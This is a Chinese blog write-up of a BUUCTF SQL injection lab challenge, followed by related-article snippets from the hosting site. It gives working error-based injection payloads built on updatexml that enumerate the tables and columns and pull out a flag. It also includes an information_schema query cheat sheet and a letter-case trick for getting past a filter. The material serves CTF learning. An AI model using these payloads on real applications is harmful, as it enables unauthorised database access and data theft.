SQL注入(buuctf web入门sql注入2)

最新推荐文章于 2024-05-18 21:20:35 发布
最新推荐文章于 2024-05-18 21:20:35 发布
阅读量1.8k 收藏 5
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/118688233
版权

1.启动靶机:

2.进入login.php界面

ps:界面没有注入口,因为这个题目是sql注入,尝试输入常规的login界面,进入了login界面

我们学习ctf,在基础阶段还是要抛开脑洞,掌握并且形成一套破解模式

3.查看源代码

这个源代码里面有用的信息就是?tips=1,但是加到url后面也没什么效果

4.抓包吧

尝试了一下普通的注入没有啥用

5.先用burpsuit查看数据库

注入语句 1' and updatexml(1,concat(0x7e,(select database()),1)

中转(ctrl+r到repeater)

添加trips=1,改变调整变量(我加了#,其实在前面界面注入的时候就可以加上#)

6.利用bp查看数据库下的表

1' and updatexml(1,concat(0x7e,(selEct group_concat(table_name) from information_schema.tables where table_schema=database())),1)

不知道为什么这个select里面为什么要大写,l和e大写都行,但是select就不行

7.利用bp查看敏感表下的字段

1' and updatexml(1,concat(0x7e,(seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),0x7e),1)

8.利用bp,从字段中获取flag

1' and updatexml(1,concat(0x7e,(seLEct flag from fl4g),0x7e),1)

得到flag

知识链接:

1.添加#表示注释掉后面的语句

2.sql语句group_cat是ctf中常用语句:

SCHEMATA :存储数据库名的,

SCHEMA_NAME:表示数据库名称

TABLES :存储表名的

TABLE_SCHEMA:表示表所属的数据库名称;

TABLE_NAME:表示表的名称

COLUMNS :存储字段名的

TABLE_SCHEMA:表示表所属的数据库名称;

TABLE_NAME:表示所属的表的名称

COLUMN_NAME:表示字段名

爆所有数据名:

select group_concat(SCHEMA_NAME) from information_schema.schemata

爆当前库的所有表:

select group_concat(table_name) from information_schema.tables where table_schema=database()

得到表中的字段名 将敏感的表进行16进制编码adminuser=0x----

select group_concat(column_name) from information_schema.columns where table_name=0x----

group_cat是用来表示连接的,将里面的参数连接成字符串

3.0x7e是十六进制ASCII码表示“~”

半杯雨水敬过客
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[Writeup]BUU SQL COURSE1[入门级]
小飒的博客
06-08 650
观察网址,好像找到注入点 获得数据库 ctftraining获得表名 FLAG_TABLE获得列名 FLAG_COLUMN获得数据时发现数据是空的,只能想另外办法 看能不能登录news的数据库下找到 admin的密码:67fef29ef7beb75f567587f135fa26a0 获得flag payload: 使用sqlmap burp里直接可以找到注入点...
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 4968
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套题目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第二个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
buu(sql注入)
qq_62046696的博客
08-23 1202
打开界面,我们发现是 admin账号还是monster,这道题肯定与cookie有关,直接在cookie中。列数不对,or也被过滤,大小写,双写都不能绕过,呃呃呃,这样order,information都被过滤了。回显位置,2,3现在我们需要找一个命令替换掉,information.schema_tables,这应该是注入点的位置, 发现# --+被过滤,然后是上传发现,没空格,那就有/**/代替空格。啥都没有,考察cookie用admin登录,都不需要密码,感觉挺离谱的,直接出来试一下monster,..
【Baisc】BUU SQL COURSE
最新发布
欢迎来到我的学习笔记薄
05-18 535
继续肝。
BUUCTF [第一章 web入门]SQL注入-2
qq_45707441的博客
12-22 2524
经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"} 当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"} 根据返回的字符串,我们可以写出解决的python脚本 #数据库名字长度 import string import requests url="http://e2cc3e..
CTF刷题记录Buuctf-N1BOOK-sql2
m_de_g的博客
06-09 1176
N1BOOK-SQL2 一、解题思路 直接访问,会出现403,难受,再看一下提示:请访问/login.php /user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/login.php 1.养成好习惯,Ctrl + U 查看页面源代码 2.看到提示,那直接按照提示,走一波 3..
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1826
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
sql注入之新手入门示例详解
09-10
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有正确地过滤或转义这些输入,攻击者就能插入恶意的SQL语句,从而获取、修改、删除数据库中的敏感信息,甚至完全控制...
BUU SQL COURSE 1 1(SQL注入
小谢的博客
10-25 3051
BUU SQL COURSE 1 1(SQL注入)题解
BUUCTF记录-Basic
繁华若有光的博客
11-16 4381
本机环境:Windows10 一、Linux Labs 1 题目提示: ssh 用户名:root 密码:123456 地址和端口为动态分配的。 解题思路: 1. 打开cmd控制台,ssh连接靶机,然后输入密码 ssh -p 25836 root@node4.buuoj.cn 2.现在位于用户目录~,cd切换至根目录/,查看根目录下所有文件,发现flag.txt,查看文件内容 二、BUU LFI Course1 题目提示: LFI:本地文件包含 解题思路: 本关考察本地文件包含.
[初级]sql注入BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3754
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
BUUCTF&&SQL注入(部分)
huohaowen的博客
01-30 1291
今天不被靶场打,被ctf虐😓😓😓
BUUCTF 2
qq_52431855的博客
01-15 163
知识点: SQL堆叠注入:在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。 show 在过滤了 select 和 where 的情况下,还可以使用 show 来爆出数据库名,表名,和列名。 show datebases; //数据库。 show tables; //表名。 show columns from table; //字段。 alert 作用:修改已知表的列。( 添加:ad
CTF从零到一 SQL注入-2
shirazawah的博客
09-15 396
看到题目是一个系统,尝试输入值。 返回账号不存在。尝试输入admin 发现是有这个值的,然后就没有头绪了,查看源代码发现提示。 根据提示开启mysql错误提示,并使用burp发包。 因为是报错,所以自然想到书上的报错注入并尝试使用。 name=admin'+or+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_sche...
BUU SQL COURSE 1
qq_51902218的博客
08-25 2321
1. 观察页面,只有两块主要内容,热点和登录 2. 测试登录,发现貌似没用存在注入点 3. 高度怀疑热点 ,这时候,我们打开火狐浏览器,用f12,选择网络看一下有什么猫腻 状态码200:请求已成功,请求所希望的响应头或数据体将随此响应返回。即返回的数据为全量的数据,如果文件不通过GZIP压缩的话,文件是多大,则要有多大传输量。 状态码304:如果客户端发送了一个带条件的 GET 请求且该请求已被允许,而文档的内容(自上次访问以来或者根据请求的条件)并没有改变,则服务器应当返回这个状态码...
BUU SQL COURSE 11
WEB渗透测试 从入门到萌新
04-19 1277
打开之后 F12查看 http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1 找到注入点 sql手工注入流程 1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='1 2、判断列数:?id=1 order by 1,2,3 3、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3 ..
渗透学习入门SQL注入
07-31
渗透学习入门SQL注入

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值